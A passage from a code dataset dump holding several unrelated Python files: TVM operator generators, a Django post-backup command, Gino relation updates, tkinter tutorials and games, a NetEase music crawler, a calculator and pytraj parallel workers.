axis=None, dtype=None):\n '''\n expand dims\n Args:\n device:\n lib_path:\n ndim:\n axis:\n dtype:\n\n Returns:\n '''\n if axis > ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = \"ExpandDim_ndim%d_%s_axis%d\" % (ndim, dtype, axis)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = topi.expand_dims(in_tensor, axis=axis)\n tensor_list = [in_tensor, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Tile(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None):\n '''\n tile\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n multiples = [tvm.var(\"k\" + str(i)) for i in range(ndim)]\n opname = \"Tile_ndim%d_%s\" % (ndim, dtype)\n print(opname)\n\n def _Compute(*C_idx):\n a_idx = [tvm.floordiv(idx, multiples[i]) for i, idx in enumerate(list(C_idx))]\n a_idx = tuple(a_idx)\n return in_tensor[a_idx]\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor') # tvm 0.6-dev: topi.tile\n shape_c = (np.array(shape) * np.array(multiples)).tolist()\n out_tensor = tvm.compute(shape_c, _Compute)\n\n tensor_list = multiples + [in_tensor, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Range(device=\"llvm\", lib_path=\"./\",\n out_dtype=None):\n '''\n range\n Args:\n device:\n lib_path:\n out_dtype:\n\n Returns:\n '''\n start = tvm.var(\"start\")\n delta = tvm.var(\"delta\")\n opname = \"Range_ndim_\" + out_dtype\n print(opname)\n\n out_tensor = tvm.compute((tvm.var(\"n0\"),), lambda i: start.astype(out_dtype) + delta.astype(out_dtype) * i, \\\n name='out_tensor')\n out_tensor = AsType(out_tensor, out_dtype)\n tensor_list = [start, delta, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, 
opname, lib_path)\n\n\ndef Split(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, output_num=None, axis=None):\n '''\n split\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n output_num:\n axis:\n\n Returns:\n '''\n if axis >= ndim:\n return\n size_splits = [tvm.var(\"split\" + str(i)) for i in range(output_num)]\n a_shape = [tvm.var(\"n\" + str(i)) for i in range(axis)] \\\n + [np.sum(size_splits)] \\\n + [tvm.var(\"n\" + str(i)) for i in range(axis + 1, ndim)]\n c_shapes = []\n for i in range(output_num):\n c_shape = []\n for j in range(ndim):\n if j == axis:\n c_shape.append(tvm.var(\"split\" + str(i)))\n else:\n c_shape.append(tvm.var(\"n\" + str(j)))\n c_shapes.append(c_shape)\n indices_or_sections = np.cumsum(size_splits).tolist()[:-1]\n opname = \"Split_ndim%d_%s_output_num%d_axis%d\" % (ndim, dtype, output_num, axis)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(a_shape, dtype=dtype, name='in_tensor')\n\n def _Compute(*C_idx):\n a_idx = list(C_idx)\n a_idx[axis] += idx_shift\n a_idx = tuple(a_idx)\n return in_tensor[a_idx]\n\n indices_or_sections_add0 = [0] + indices_or_sections\n out_tensor = []\n for i in range(output_num):\n idx_shift = indices_or_sections_add0[i]\n ci = tvm.compute(c_shapes[i], _Compute)\n out_tensor.append(ci)\n tensor_list = size_splits + [in_tensor] + out_tensor\n\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n","sub_path":"predict/module/tvm_kernel/lite/python/at_ops/at_lib.py","file_name":"at_lib.py","file_ext":"py","file_size_in_byte":40572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"493658336","text":"import json\nfrom builtins import FileExistsError\nfrom pathlib import Path\n\nfrom django.conf import settings\n\nfrom core.management.base import LoginCommand\nfrom reading.models import Post\nfrom reading.utils import export_post\n\n\nclass Command(LoginCommand):\n help = \"Backs up a 
user's posts in respective json files.\"\n\n def add_arguments(self, parser):\n parser.add_argument('--output_path', nargs=1, type=str)\n\n def handle(self, *args, **options):\n user = self.login_user()\n\n if options['output_path']:\n base_dir = Path(options['output_path'][0])\n else:\n base_dir = Path('{0}/docs/lectura_json/posts'.format(settings.BASE_DIR))\n\n base_dir.mkdir(parents=True, exist_ok=True)\n posts = Post.objects.filter(creator=user).select_related('project', 'creator')\n\n for post in posts:\n project_dir = base_dir / post.project.slug\n try:\n project_dir.mkdir(parents=True, exist_ok=False)\n except FileExistsError:\n pass\n post_filename = project_dir / '{0}.json'.format(post.slug)\n post_dict = export_post(post)\n\n with post_filename.open('w+') as f:\n f.write(json.dumps(post_dict, indent=2))\n self.stdout.write(self.style.SUCCESS(post_filename))\n","sub_path":"lectura/reading/management/commands/backup_posts.py","file_name":"backup_posts.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"311504845","text":"from sqlalchemy.sql.expression import and_\n\nfrom ..crud_relations import CrudModelRelation, CrudModelRelationType\n\n\nclass UpdateItemRelations:\n @staticmethod\n async def update_item_relations(data, item, relations):\n for relation in relations.update_item_relations:\n if relation.relation_type == CrudModelRelationType.MANY_TO_MANY:\n await UpdateItemRelations._update_item_many_to_many_relations(\n item_id=item.id,\n data=data,\n data_key=relation.field,\n through_model=relation.through_model,\n relation_key=relation.relation_key,\n base_key=relation.base_key,\n )\n if relation.relation_type == CrudModelRelationType.CHILDREN:\n await UpdateItemRelations._update_item_children_relations(\n item_id=item.id, data=data, relation=relation\n )\n if relation.relation_type == CrudModelRelationType.PARENT:\n await 
UpdateItemRelations._update_item_parent_relations(\n item, data, relation\n )\n\n @staticmethod\n async def _update_item_parent_relations(\n item, data, relation: CrudModelRelation\n ):\n prev_id = getattr(item, relation.relation_key)\n next_id = getattr(data, relation.field).dict().get(\"id\")\n if prev_id != next_id:\n update_info = {relation.relation_key: next_id}\n await item.update(**update_info).apply()\n\n @staticmethod\n async def _update_item_children_relations(\n item_id, data, relation: CrudModelRelation\n ):\n next_ids = set(\n [\n item.get(\"id\")\n for item in data.dict().get(relation.field)\n if item.get(\"id\")\n ]\n )\n prev_ids = set(\n [\n item.id\n for item in await relation.relation_model.query.where(\n getattr(relation.relation_model, relation.base_key)\n == item_id\n ).gino.all()\n ]\n )\n to_remove = prev_ids - next_ids\n to_add = next_ids - prev_ids\n\n clear_values = {relation.base_key: None}\n insert_values = {relation.base_key: item_id}\n await relation.relation_model.update.values(**clear_values).where(\n getattr(relation.relation_model, \"id\").in_(to_remove),\n ).gino.status()\n\n await relation.relation_model.update.values(**insert_values).where(\n getattr(relation.relation_model, \"id\").in_(to_add),\n ).gino.status()\n\n @staticmethod\n async def _update_item_many_to_many_relations(\n item_id,\n data,\n data_key,\n through_model,\n relation_key,\n base_key,\n ):\n through_items = await through_model.query.where(\n getattr(through_model, base_key) == item_id\n ).gino.all()\n prev_ids = set([getattr(item, relation_key) for item in through_items])\n\n next_ids = set(\n [getattr(item, \"id\") for item in getattr(data, data_key)]\n )\n\n to_remove = prev_ids - next_ids\n to_add = next_ids - prev_ids\n\n # remove items\n await through_model.delete.where(\n and_(\n getattr(through_model, base_key) == item_id,\n getattr(through_model, relation_key).in_(to_remove),\n )\n ).gino.status()\n\n # add items\n insert_values = [\n {base_key: 
item_id, relation_key: through_id}\n for through_id in to_add\n ]\n\n await through_model.insert().gino.all(insert_values)\n","sub_path":"backend/app/core/crud/view/update_relations.py","file_name":"update_relations.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"389680033","text":"# References\n# https://docs.python.org/3/library/tkinter.html#the-packer\n# https://tcl.tk/man/tcl8.6/TkCmd/pack.htm\n\nimport tkinter\n# from tkinter import * <-- this is so you don't have to type tkinter.class() when initializing an object\n\n# button clicked\ndef button_clicked():\n print(\"I got clicked\")\n new_text = user_input.get()\n # my_label.config(text=\"Button Got Clicked\")\n my_label.config(text=new_text)\n\nwindow = tkinter.Tk() # Tk class to initialize an object\nwindow.title(\"My First GUI Program\") # shows at top bar of program\nwindow.minsize(width=500, height=300) # scales to be a specified size\nwindow.config(padx=20, pady=20)\n\n# Label\nmy_label = tkinter.Label(text=\"I am a Label\", font=(\"Arial\", 24, \"bold\")) # access Label class\n# my_label.pack(side=\"top\") # place it on screen and center\n#\n# my_label[\"text\"] = \"New Text\"\nmy_label.config(text=\"New Text\")\n# my_label.place(x=100, y=200)\nmy_label.grid(column=0, row=0)\nmy_label.config(padx=50, pady=50)\n\n\n# Button\nbutton = tkinter.Button(text=\"Click Me\", command=button_clicked)\n# button.pack()\nbutton.grid(column=1, row=1)\n\nnew_button = tkinter.Button(text=\"New Button\")\nbutton.grid(column=2, row=0)\n\n# Entry\nuser_input = tkinter.Entry(width=10)\n# user_input.pack()\nprint(user_input.get())\nuser_input.grid(column=3, row=2)\n\n\n\n\nwindow.mainloop() # keeps window on screen, built into the package\n\n\n# # ---- MANY POSITIONAL ARGUMENTS ----\n# # * will allow you to use as many arguments for that parameter\n# def add(*args):\n# for n in args:\n# print(n)\n#\n# # E.g. 
add(3, 5, 7, 8)\n# # args is a tuple\n","sub_path":"intermediate_programs/day27-GUI-FunctionArgs-Tkinter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"10871737","text":"#!/usr/bin/python3\nfrom tkinter import *\nfrom threading import *\nfrom multiprocessing import *\nimport locale\nimport time\nimport shelve\nimport atexit\n# TODO\n# - Change independent item mainloop threads into one single mainloop counter threads\n# \\- Create system for inserting item into mainloop\n\n# open save file as object save and load money\nsave = shelve.open('savefile.db')\nmoney = save['money']\n\nif not save['scaler']:\n startuproot = Tk()\n startuproot.title('Set the difficulty.')\n startuproot.geometry('200x50')\n scalerentry = Entry(startuproot)\n scalerentry.insert(0, 32)\n\n def get_entry_output():\n global PRICE_SCALER\n PRICE_SCALER = int(scalerentry.get())\n startuproot.destroy()\n confirm = Button(startuproot, text=\"Done\", command=get_entry_output)\n scalerentry.pack()\n confirm.pack()\n startuproot.mainloop()\n\nelse:\n PRICE_SCALER = save['scaler']\n\n# Set locale for number formatting\nlocale.setlocale(locale.LC_ALL, 'en_US.utf8')\n\n\ndef number_format(num):\n return locale.format(\"%d\", num, grouping=True)\n\n\nclass item:\n\n def __init__(self, tk_master, name, bpay, bcost, plural, count):\n frame = Frame(tk_master)\n frame.pack()\n global money\n self.name = name\n self.bcost = bcost\n self.plural = plural\n self.buymsg = (self.name + \" purchased!\")\n self.cost = self.bcost\n self.bpay = bpay\n self.pay = self.bpay\n self.count = count\n self.btnmsg = (\"[\" + str(self.count) + \"] Buy \" + self.name)\n self.buyBtn = Button(frame, text=self.btnmsg, command=self.buy,\n justify=CENTER, anchor=N, font=(\"Helvetica\", 10, \"bold\"), relief=FLAT)\n self.buyBtn.config(text=\"[\" + str(self.count) + \"] Buy \" + self.name)\n 
self.buyBtn.pack(fill=X, ipady=1, ipadx=1)\n # self.Thread = Thread(name=(self.name + \" Thread\"), target=self.Thread_target)\n # self.Thread.daemon = True\n # self.Thread.start()\n\n def get_mps(self):\n return self.count * self.pay\n\n def profitify(self):\n global money\n money += self.count * self.pay\n if self.cost > money:\n self.buyBtn.config(fg=\"gray38\")\n else:\n self.buyBtn.config(fg=\"black\")\n\n def buy(self):\n global money\n if self.cost < money:\n update_status(self.buymsg)\n self.count += 1\n self.buyBtn.config(\n text=\"[\" + str(self.count) + \"] Buy \" + self.name)\n money -= self.cost\n self.inflate()\n mpsLbl.config(text=(\"Money Per Second: \" + number_format(getMPS(thug) + getMPS(\n thief) + getMPS(gang) + getMPS(mobster) + getMPS(mobboss) + getMPS(mafia))))\n else:\n update_status(\"Insufficient funds. \" + self.plural +\n \" Cost: \" + str(number_format(self.cost)))\n\n def inflate(self):\n newcost = round((self.bcost * 0.05), 2)\n self.cost += newcost\n\n # def Thread_target(self):\n # global money\n # while True:\n # time.sleep(1)\n # money += self.count * self.pay\n # if self.cost > money:\n # self.buyBtn.config(fg=\"gray38\")\n # else:\n # self.buyBtn.config(fg=\"black\")\n\n\nroot = Tk()\n\n\ndef moneyLblThreadTarget():\n while True:\n moneyLbl[\"text\"] = (\"$\" + str(number_format(money)))\n\n\n# titleLbl = Label(root, text=\"Black Ink: The Mob\", anchor=N, justify=CENTER, wraplength=120, relief=FLAT, font=(\"overpass\", 9, \"bold\"), bg=\"black\", fg=\"white\")\n# titleLbl.pack(fill=X)\n\n\nmoneyLbl = Label(root, text=\"\", anchor=N, justify=CENTER, wraplength=120,\n relief=FLAT, font=(\"overpass\", 12, \"bold\"), bg=\"black\", fg=\"white\")\nmoneyLbl.pack(ipady=1, ipadx=2, fill=X)\n\n\nmoneyLblThread = Thread(target=moneyLblThreadTarget,\n name=\"MoneyLabelOutputDaemon\")\nmoneyLblThread.daemon = True\nmoneyLblThread.start()\n\nthug = item(root, bpay=1, bcost=25, name=\"Thug\",\n plural=\"Thugs\", count=save['thugs'])\n\nthief 
= item(root, bpay=(thug.bpay * PRICE_SCALER), bcost=(thug.bcost *\n PRICE_SCALER), name=\"Thief\", plural=\"Thieves\", count=save['thieves'])\n\ngang = item(root, bpay=(thief.bpay * PRICE_SCALER), bcost=(thief.bcost *\n PRICE_SCALER), name='Gang', plural=\"Gangs\", count=save['gangs'])\n\nmobster = item(root, bpay=(gang.bpay * PRICE_SCALER), bcost=(gang.bcost *\n PRICE_SCALER), name=\"Mobster\", plural=\"Mobsters\", count=save['mobsters'])\n\nmobboss = item(root, bpay=(mobster.bpay * PRICE_SCALER), bcost=(mobster.bcost *\n PRICE_SCALER), name=\"Mob Boss\", plural=\"Mob Bosses\", count=save['mobbosses'])\n\nmafia = item(root, bpay=(mobboss.bpay * PRICE_SCALER), bcost=(mobboss.bcost *\n PRICE_SCALER), name=\"Mafia\", plural=\"Mafias\", count=save['mafias'])\n\nregiment = item(root, bpay=(mafia.bpay * PRICE_SCALER), bcost=(mafia.bcost * PRICE_SCALER),\n name=\"Military Regiment\", plural=\"Military Regiments\", count=save['regiments'])\n\ncolony = item(root, bpay=(regiment.bpay * PRICE_SCALER), bcost=(regiment.bcost *\n PRICE_SCALER), name=\"Colony\", plural=\"Colonies\", count=save['colonies'])\n\nmooncolony = item(root, bpay=(colony.bpay * PRICE_SCALER), bcost=(colony.bcost * PRICE_SCALER),\n name=\"Lunar Colony\", plural=\"Lunar Colonies\", count=save['mooncolonies'])\n\nif save['timeofexit'] != False:\n money_while_gone = (round((time.time() - save['timeofexit']), 0) * (thug.get_mps() + thief.get_mps() + gang.get_mps(\n ) + mobster.get_mps() + mobboss.get_mps() + mafia.get_mps() + regiment.get_mps() + colony.get_mps() + mooncolony.get_mps()))\n money += money_while_gone\n\n\ndef counterLoop():\n while True:\n time.sleep(1)\n thug.profitify()\n thief.profitify()\n gang.profitify()\n mobster.profitify()\n mobboss.profitify()\n mafia.profitify()\n regiment.profitify()\n colony.profitify()\n mooncolony.profitify()\n\ncounterThread = Thread(target=counterLoop, name=\"Counter Thread\")\ncounterThread.daemon = True\ncounterThread.start()\n\n# load game data\nthug.count = 
save['thugs']\nthief.count = save['thieves']\ngang.count = save['gangs']\nmobster.count = save['mobsters']\nmobboss.count = save['mobbosses']\nmafia.count = save['mafias']\nregiment.count = save['regiments']\ncolony.count = save['colonies']\nmooncolony.count = save['mooncolonies']\n\nthug.buyBtn.config(text=\"[\" + str(thug.count) + \"] Buy \" + thug.name)\n\n\ndef exit_game():\n\n confirmRoot = Tk()\n confirmLabel = Label(confirmRoot, text='Save?')\n confirmYes = Button(confirmRoot, text='Yes', command=save_vars)\n confirmNo = Button(confirmRoot, text='No', command=reset_vars)\n\n confirmLabel.pack()\n confirmYes.pack()\n confirmNo.pack()\n confirmRoot.mainloop()\n\n\ndef reset_vars():\n\n save['timeofexit'] = False\n save['scaler'] = False\n save['money'] = 100\n save['thugs'] = 1\n save['thieves'] = 0\n save['gangs'] = 0\n save['mobsters'] = 0\n save['mobbosses'] = 0\n save['mafias'] = 0\n save['regiments'] = 0\n save['colonies'] = 0\n save['mooncolonies'] = 0\n save.close()\n exit()\n\n\ndef save_vars():\n\n time_of_exit = time.time()\n\n save['timeofexit'] = time_of_exit\n save['scaler'] = PRICE_SCALER\n save['money'] = money\n save['thugs'] = thug.count\n save['thieves'] = thief.count\n save['gangs'] = gang.count\n save['mobsters'] = mobster.count\n save['mobbosses'] = mobboss.count\n save['mafias'] = mafia.count\n save['regiments'] = regiment.count\n save['colonies'] = colony.count\n save['mooncolonies'] = mooncolony.count\n save.close()\n exit()\n\natexit.register(exit_game)\n\n\ndef getMPS(target):\n return target.count * target.pay\n\n\ndef showMoney():\n update_status(\"Money: \" + str(money))\n\n\ndef showMps():\n update_status(\"Money Per Second: \" + str((getMPS(thug) + getMPS(thief) +\n getMPS(gang) + getMPS(mobster) + getMPS(mobboss) + getMPS(mafia))))\n\n\ndef steal():\n global money\n # for roughly every $200 player has, stealing profit goes up by one.\n amount_stolen = 1 + int(round(money / 400, 0))\n money += amount_stolen\n 
update_status(\"Money stolen! +\" + str(amount_stolen) + \" Money!\")\n\n\ndef generateChar(char, number):\n return str(char * number)\n\n\nroot.title(\"Black Ink: The Mob\")\n\nspacer = Label(root, text=generateChar(\" \", 60) + \"\\n\",\n font=(\"Helvetica\", 5, \"underline\"))\nspacer.pack()\n\nstealBtn = Button(root, text=\"Steal\", command=steal, justify=CENTER, anchor=N)\nstealBtn.pack()\n\nmpsLbl = Label(root, text=\"Money Per Second: 1\")\nmpsLbl.pack()\n\nstatus = Label(root, text=\"\", anchor=N, justify=CENTER,\n wraplength=120, relief=FLAT)\nstatus.pack()\n\n\ndef update_status(newText):\n current_status = newText\n status[\"text\"] = current_status\n\nroot.mainloop()\n","sub_path":"blackink.py","file_name":"blackink.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"614634251","text":"# -*- coding: gbk -*-\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport re\nimport dbutil\nimport requests\nimport json\n\n\nclass Singer:\n def __init__(self):\n self.driver = webdriver.PhantomJS(executable_path=\"phantomjs.exe\")\n self.re_id = re.compile('\\d+')\n self.table = 'singer'\n self.column = 'user_id,user_name'\n self.conn = dbutil.Database(user='root', passwd='', db='wy_music')\n\n def _get_url(self):\n self.cat_ids = ['1001', '1002', '1003',\n '2001', '2002', '2003',\n '6001', '6002', '6003',\n '7001', '7002', '7003',\n '4001', '4002', '4003']\n self.initial = [-1, 0] + ([65 + i for i in range(26)])\n for i in self.cat_ids:\n for j in self.initial:\n yield 'https://music.163.com/#/discover/artist/cat?id=%s&initial=%s' % (i, j)\n\n def _get_page_source(self, url):\n try:\n self.driver.get(url)\n self.driver.switch_to.frame(self.driver.find_element_by_xpath(\"//iframe\"))\n return self.driver.page_source\n except Exception as e:\n print(e)\n\n def _quit_driver(self):\n self.driver.quit()\n\n # 你不会知道某些歌手的名字里有单引号-0-\n def format_str(self, 
str):\n return '\\'' + str.replace('\\'', '') + '\\''\n\n def crawl(self):\n for url in self._get_url():\n soup = BeautifulSoup(self._get_page_source(url), \"html.parser\")\n items = soup.find(id='m-artist-box').find_all('li')\n for i in range(len(items)):\n if i < 10:\n id = re.search(self.re_id, items[i].p.a['href']).group()\n name = items[i].p.a.text\n else:\n id = re.search(self.re_id, items[i].a['href']).group()\n name = items[i].a.text\n values = ','.join((str(id), self.format_str(name)))\n print(values)\n self.conn.insert(table=self.table, column=self.column, values=values)\n self.conn.close()\n self._quit_driver()\n\n\nclass HotSong:\n def __init__(self):\n self.table = 'hot_song'\n self.column = 'singer_id,song_id,song_name,album_id,album_name'\n self.conn = dbutil.Database(user='root', passwd='', db='wy_music')\n\n def _get_url(self, **kwargs):\n urls = []\n ids = self.conn.select(**kwargs)\n for id in ids:\n urls.append('https://music.163.com/artist?id=%s' % id)\n return urls\n\n def format_str(self, str):\n if str and len(str) > 0:\n return '\\'' + str.replace('\\'', '').replace('\\\\', '\\\\\\\\') + '\\''\n else:\n return '\\'' + '无此信息!!!!!' 
+ '\\''\n\n def crawl(self):\n _from = 0\n limit = 100\n success = False\n while not success:\n res = self._get_url(column='singer_id', table='singer', _from=_from, limit=limit)\n if len(res) >= 1:\n print(_from)\n for url in res:\n print(url)\n try:\n req = requests.get(url, timeout=10)\n soup = BeautifulSoup(req.text, 'html.parser')\n text = soup.find(id='song-list-pre-cache').find('textarea').text\n songs = json.loads(text)\n except Exception as e:\n self.conn.insert(table='failure', column='url,note', values=','.join((self.format_str(url), self.format_str(str(e)))))\n continue\n for song in songs:\n singer_id = song['artists'][0]['id']\n song_id = song['id']\n song_name = song['name']\n album_id = song['album']['id']\n album_name = song['album']['name']\n print(singer_id, song_id, song_name, album_id, album_name)\n values = ','.join((self.format_str(str(singer_id)),\n self.format_str(str(song_id)),\n self.format_str(song_name),\n self.format_str(str(album_id)),\n self.format_str(album_name)))\n self.conn.insert(table=self.table, column=self.column, values=values)\n _from += limit\n else:\n success = True\n self.conn.close()\n\n\nif __name__ == '__main__':\n s = HotSong()\n s.crawl()\n","sub_path":"163_music_singer.py","file_name":"163_music_singer.py","file_ext":"py","file_size_in_byte":4658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388318880","text":"import random as r\nimport time as t\nfrom colorama import init, Fore, Back, Style\nnombre=input(\"Hola vamos a jugar a piedra papel o tijera, mi nombre es ktlm4. ¿Y tú, cómo te llamas ? \")\nprint(\" encantado de conocerte \" + nombre)\nprint(\"empezamos\")\nt.sleep(2)\ntu=0\nyo=0\nwhile yo<3 and tu<3:\n lista=[\"piedra\",\"papel\",\"tijera\"]\n print(\"piedra,papel o tijera\")\n t.sleep(1)\n print(\"una, dos y tres\")\n t.sleep(2)\n\n print(Fore.GREEN+r.choice(lista))\n print(Fore.WHITE)\n ganado=input(\"¿quien ha ganado? 
\")\n if ganado==\"tu\":\n tu=tu+1\n print()\n elif ganado==\"empate\":\n print()\n else:\n yo=yo+1\n print()\nif tu>yo:\n ganador=\"tú\"\n print(Fore.BLUE+\"¡Gané yo!\")\nelse:\n ganador=\"yo\"\n print(Fore.BLUE+\"¡Ganaste! \" + nombre+Fore.WHITE)","sub_path":"piedra papel tijera.py","file_name":"piedra papel tijera.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"510405240","text":"#Simple Calculator program\r\ndef the_calc():\r\n \"\"\"\r\n Calculates based off of user input\r\n This is an example of a docstring\r\n \"\"\"\r\n print(\"Welcome!\")\r\n while True:\r\n try:\r\n \r\n print(\"\\nOptions Menu\")\r\n print(\"Enter 'add' to add two numbers\")\r\n print(\"Enter 'subtract' to subtract two numbers\")\r\n print(\"Enter 'multiply' to multiply two numbers\")\r\n print(\"Enter 'divide' to divide two numbers\")\r\n print(\"Enter 'quit' to exit the program\")\r\n user_input = input(\": \")\r\n \r\n if user_input == \"quit\":\r\n break\r\n elif user_input == \"add\":\r\n add1 = float(input(\"Type the first number:\"))\r\n add2 = float(input(\"Type the second number:\"))\r\n add3 = float(add1) + float(add2)\r\n print (\"The result is:\", add3)\r\n contconfirm = input(\"Press enter to continue:\")\r\n elif user_input == \"subtract\":\r\n subtract1 = float(input(\"Type the first number:\"))\r\n subtract2 = float(input(\"Type the second number:\"))\r\n subtract3 = float(subtract1) - float(subtract2)\r\n print (\"The result is:\", subtract3)\r\n contconfirm = input(\"Press enter to continue:\")\r\n elif user_input == \"multiply\":\r\n multiply1 = float(input(\"Type the first number:\"))\r\n multiply2 = float(input(\"Type the second number:\"))\r\n multiply3 = float(multiply1) * float(multiply2)\r\n print (\"The result is:\", multiply3)\r\n contconfirm = input(\"Press enter to continue:\")\r\n elif user_input == \"divide\":\r\n divide1 = float(input(\"Type the first 
number:\"))\r\n divide2 = float(input(\"Type the second number:\"))\r\n divide3 = float(divide1) / float(divide2)\r\n print (\"The result is:\", divide3)\r\n contconfirm = input(\"Press enter to continue:\")\r\n else:\r\n print(\"Unknown Input\")\r\n except ValueError:\r\n pass\r\n print(\"Invalid entry!\")\r\n\r\nthe_calc()\r\n\r\n","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"581201202","text":"import numpy as np\nfrom functools import partial\nfrom pytraj import Frame\nfrom pytraj import pipe\nfrom pytraj.datasets import CpptrajDatasetList\nfrom pytraj.externals.six import string_types\n\n\ndef check_valid_command(commands):\n '''\n\n Parameters\n ----------\n commands : list/tuple of str\n\n Returns\n -------\n cmlist : newly updated command list\n need_ref : bool, whether to provide reference or not\n '''\n from pytraj.c_commands import analysis_commands\n\n if isinstance(commands, string_types):\n commands = [line.strip() for line in commands.split('\\n') if line]\n else:\n commands = commands\n\n new_commands = commands[:]\n need_ref = False\n for idx, cm in enumerate(commands):\n cm = cm.strip()\n\n # try to insert 'refindex 0' if action requires ref but user does not provide\n if 'refindex' in cm:\n need_ref = True\n\n if ((cm.startswith('rms') or\n cm.startswith('nastruct') or\n cm.startswith('center') or\n cm.startswith('distrmsd') or\n cm.startswith('nativecontacts') or\n cm.startswith('symmetricrmsd')) and 'refindex' not in cm):\n\n cm = cm + ' refindex 0 '\n need_ref = True\n\n if cm.startswith('matrix'):\n raise ValueError('Not support matrix')\n\n for word in analysis_commands:\n if cm.startswith(word):\n raise ValueError(\n 'Not support cpptraj analysis keyword for parallel '\n 'calculation. 
You can use pmap for cpptraj actions to speed up the '\n 'IO and then perform '\n 'analysis in serial')\n new_commands[idx] = cm\n\n return new_commands, need_ref\n\n\ndef worker_byfunc(rank,\n n_cores=None,\n func=None,\n traj=None,\n args=None,\n kwd=None,\n iter_options=None,\n apply=None):\n '''worker for pytraj's functions\n '''\n # need to unpack args and kwd\n if iter_options is None:\n iter_options = {}\n mask = iter_options.get('mask')\n rmsfit = iter_options.get('rmsfit')\n autoimage = iter_options.get('autoimage', False)\n iter_func = apply\n frame_indices = kwd.pop('frame_indices', None)\n\n if frame_indices is None:\n my_iter = traj._split_iterators(n_cores,\n rank=rank,\n mask=mask,\n rmsfit=rmsfit,\n autoimage=autoimage)\n else:\n my_indices = np.array_split(frame_indices, n_cores)[rank]\n my_iter = traj.iterframe(frame_indices=my_indices,\n mask=mask,\n rmsfit=rmsfit,\n autoimage=autoimage)\n n_frames = my_iter.n_frames\n kwd_cp = {}\n kwd_cp.update(kwd)\n\n if iter_func is not None:\n final_iter = iter_func(my_iter)\n kwd_cp['top'] = my_iter.top\n else:\n final_iter = my_iter\n\n data = func(final_iter, *args, **kwd_cp)\n return (rank, data, n_frames)\n\n\ndef worker_by_actlist(rank,\n n_cores=2,\n traj=None,\n lines=None,\n dtype='dict',\n ref=None,\n kwd=None):\n '''worker for cpptraj commands (string)\n '''\n # need to make a copy if lines since python's list is dangerous\n # it's easy to mess up with mutable list\n # do not use lines.copy() since this is not available in py2.7\n # Note: dtype is a dummy argument, it is always 'dict'\n if lines is None:\n lines = []\n frame_indices = kwd.pop('frame_indices', None)\n\n new_lines, need_ref = check_valid_command(lines)\n\n if frame_indices is None:\n my_iter = traj._split_iterators(n_cores, rank=rank)\n else:\n my_iter = traj.iterframe(\n frame_indices=np.array_split(frame_indices, n_cores)[rank])\n\n if ref is not None:\n if isinstance(ref, Frame):\n reflist = [ref, ]\n else:\n # list/tuplex\n 
reflist = ref\n else:\n reflist = [traj[0],] if need_ref else []\n\n dslist = CpptrajDatasetList()\n\n if reflist:\n for ref_ in reflist:\n ref_dset = dslist.add('reference')\n ref_dset.top = traj.top\n ref_dset.add_frame(ref_)\n\n # create Frame generator\n fi = pipe(my_iter, commands=new_lines, dslist=dslist)\n\n # just iterate Frame to trigger calculation.\n for _ in fi:\n pass\n\n # remove ref\n return (rank, dslist[len(reflist):].to_dict())\n\n\ndef _load_batch_pmap(n_cores=4,\n lines=None,\n traj=None,\n dtype='dict',\n root=0,\n mode='multiprocessing',\n ref=None,\n **kwd):\n '''mpi or multiprocessing\n '''\n if lines is None:\n lines = []\n if mode == 'multiprocessing':\n from multiprocessing import Pool\n pfuncs = partial(worker_by_actlist,\n n_cores=n_cores,\n traj=traj,\n dtype=dtype,\n lines=lines,\n ref=ref,\n kwd=kwd)\n pool = Pool(n_cores)\n data = pool.map(pfuncs, range(n_cores))\n pool.close()\n pool.join()\n return data\n elif mode == 'mpi':\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n rank = comm.rank\n data_chunk = worker_by_actlist(rank=rank,\n n_cores=n_cores,\n traj=traj,\n dtype=dtype,\n lines=lines,\n ref=ref,\n kwd=kwd)\n # it's ok to use python level `gather` method since we only do this once\n # only gather data to root, other cores get None\n data = comm.gather(data_chunk, root=root)\n return data\n else:\n raise ValueError('only support multiprocessing or mpi')\n\n\ndef worker_state(rank, n_cores=1, traj=None, lines=None, dtype='dict'):\n '''worker for CpptrajState\n '''\n # need to make a copy if lines since python's list is dangerous\n # it's easy to mess up with mutable list\n # do not use lines.copy() since this is not available in py2.7\n if lines is None:\n lines = []\n my_lines = [line for line in lines]\n from pytraj.utils import split_range\n from pytraj.core.c_core import _load_batch\n\n mylist = 